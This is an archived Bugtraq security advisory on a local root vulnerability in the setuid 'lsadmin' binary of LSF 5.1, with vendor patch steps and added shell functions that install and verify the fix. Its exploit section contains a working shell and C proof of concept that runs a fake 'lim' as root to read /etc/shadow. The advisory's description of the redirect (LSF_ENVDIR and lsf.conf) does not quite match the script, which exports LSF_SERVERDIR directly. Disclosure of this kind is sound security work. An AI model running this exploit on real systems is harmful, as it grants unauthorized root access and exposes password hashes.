102346 2003-05-22 19:30 /95 lines/ Tomasz Grabowski <cadence@apollo.aci.com.pl>
Imported: 2003-05-22 19:30 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4975>
Comment on text 102190 by dong-h0un U <xploit@hackermail.com>
Subject: Security advisory: LSF 5.1 local root exploit
------------------------------------------------------------
Security Advisory
22 May 2003

Local root in LSF 5.1

Name:             Load Sharing Facility version 5.1
Severity:         High
Vendor URL:       http://www.platform.com
Author:           Tomasz Grabowski (cadence@aci.com.pl)
Vendor notified:  25 Feb 2003
Vendor response:  25 Feb 2003
Vendor fix:       19 Mar 2003
Commercial:       I'm looking for a new job

Impact:

An attacker can gain root privileges by forcing the 'lsadmin' binary to
execute code of the attacker's choice. The 'lsadmin' binary is setuid root.

Description:

The 'lsadmin' binary has a "ckconfig" command, used to check the
correctness of the config files. Right after it starts, it runs the
external 'lim' binary, and it takes the path to 'lim' from the
LSF_SERVERDIR variable in the lsf.conf file. A regular user can write his
own lsf.conf file and, by setting the LSF_ENVDIR variable, force 'lsadmin'
to use it instead of the default /etc/lsf.conf. The attacker can therefore
point LSF_SERVERDIR at a directory containing his own 'lim' binary, which
'lsadmin' then executes with setuid root privileges.

How to patch:

1) Download the lsadmin patch from the Platform ftp site:
   ftp ftp.platform.com
   location: /patches/5.1/patch/sup_by_dev33993/
   file:     lsadmin5.1_<os>.Z
   If you do not have a username/password to access ftp.platform.com,
   contact support@platform.com

2) In LSF_BINDIR, move the old lsadmin to lsadmin.old. Uncompress and
   rename the downloaded binary to lsadmin. Move the new lsadmin to
   LSF_BINDIR. Make sure its permissions are 4755.
For more information on the patch or related questions, contact
support@platform.com

Exploit:

# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ
# Proof of concept - for educational purposes only!

# Build a fake 'lim' that lsadmin will run as root.
cat <<__END__ > attacker_code.c
#include <stdio.h>
#include <unistd.h>   /* setuid(), setgid() */

int main(void)
{
    FILE *secret_file;
    FILE *temp_file;
    char one_line[128];

    setuid(0); setgid(0);
    secret_file = fopen("/etc/shadow", "r");
    temp_file = fopen(".temp.file", "w");
    fgets(one_line, 120, secret_file);
    fputs(one_line, temp_file);
    fclose(secret_file);
    fclose(temp_file);
    return 0;
}
__END__
gcc attacker_code.c -o lim
chmod 777 lim
# Point lsadmin at the current directory as LSF_SERVERDIR.
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file

---
Tomasz Grabowski (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl
(102346) /Tomasz Grabowski <cadence@apollo.aci.com.pl>/(Reflowed)
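As an added example, not part of the advisory and not Platform's own patch tooling, the POSIX shell functions below carry out step 2 of the vendor's patch procedure and verify the result: the already-uncompressed patched binary is installed as lsadmin in LSF_BINDIR after the old one is moved to lsadmin.old, ownership is set to root when the script runs as root, and the mode is checked to be 4755. The function names, the removal of the setuid bit from lsadmin.old (so the vulnerable copy cannot still be run as root), and the use of GNU `stat -c` are this example's own assumptions; uncompressing lsadmin5.1_<os>.Z with `uncompress` is done beforehand, outside these functions.

```shell
#!/bin/sh
# Added example: install the patched lsadmin (step 2 of the advisory) and
# verify the result. Function names and checks are this example's own.

# install_lsadmin NEWBIN BINDIR
#   NEWBIN: the uncompressed patched binary (run uncompress on the .Z file first)
#   BINDIR: the LSF_BINDIR of the installation
install_lsadmin() {
    newbin=$1
    bindir=$2
    [ -f "$newbin" ] || { echo "new binary not found: $newbin" >&2; return 1; }
    [ -d "$bindir" ] || { echo "LSF_BINDIR is not a directory: $bindir" >&2; return 1; }

    # Keep the old binary as lsadmin.old, as the vendor procedure says, but
    # drop its setuid bit so the vulnerable copy is no longer usable as root
    # (an addition of this example, not a vendor step).
    if [ -e "$bindir/lsadmin" ]; then
        mv "$bindir/lsadmin" "$bindir/lsadmin.old" || return 1
        chmod 0755 "$bindir/lsadmin.old" || return 1
    fi

    # Copy the new binary into place, then set owner (root only when we are
    # root) and the 4755 mode the advisory requires.
    cp "$newbin" "$bindir/lsadmin" || return 1
    if [ "$(id -u)" -eq 0 ]; then
        chown root "$bindir/lsadmin" || return 1
    fi
    chmod 4755 "$bindir/lsadmin" || return 1
}

# lsadmin_mode BINDIR: print the octal mode of BINDIR/lsadmin (GNU stat assumed).
lsadmin_mode() {
    stat -c '%a' "$1/lsadmin"
}

# verify_lsadmin BINDIR: succeed only if lsadmin is present with mode 4755 and
# the backup, if any, no longer carries the setuid bit.
verify_lsadmin() {
    bindir=$1
    mode=$(lsadmin_mode "$bindir") || return 1
    echo "$bindir/lsadmin mode: $mode"
    [ "$mode" = "4755" ] || { echo "unexpected mode $mode, expected 4755" >&2; return 1; }
    if [ -e "$bindir/lsadmin.old" ]; then
        oldmode=$(stat -c '%a' "$bindir/lsadmin.old") || return 1
        [ "$oldmode" = "755" ] || { echo "lsadmin.old still has mode $oldmode" >&2; return 1; }
    fi
    return 0
}
```

Typical use is `install_lsadmin ./lsadmin "$LSF_BINDIR" && verify_lsadmin "$LSF_BINDIR"` as root; the verify step is the one to keep around, since it also reports any later drift from the 4755 mode or a lingering setuid lsadmin.old.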